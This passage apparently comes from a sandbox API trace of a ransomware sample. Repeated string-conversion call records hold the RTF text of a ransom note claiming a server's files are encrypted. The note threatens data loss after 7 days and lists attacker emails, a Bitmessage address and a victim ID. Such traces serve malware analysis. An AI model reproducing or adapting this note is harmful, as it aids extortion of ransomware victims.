br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t 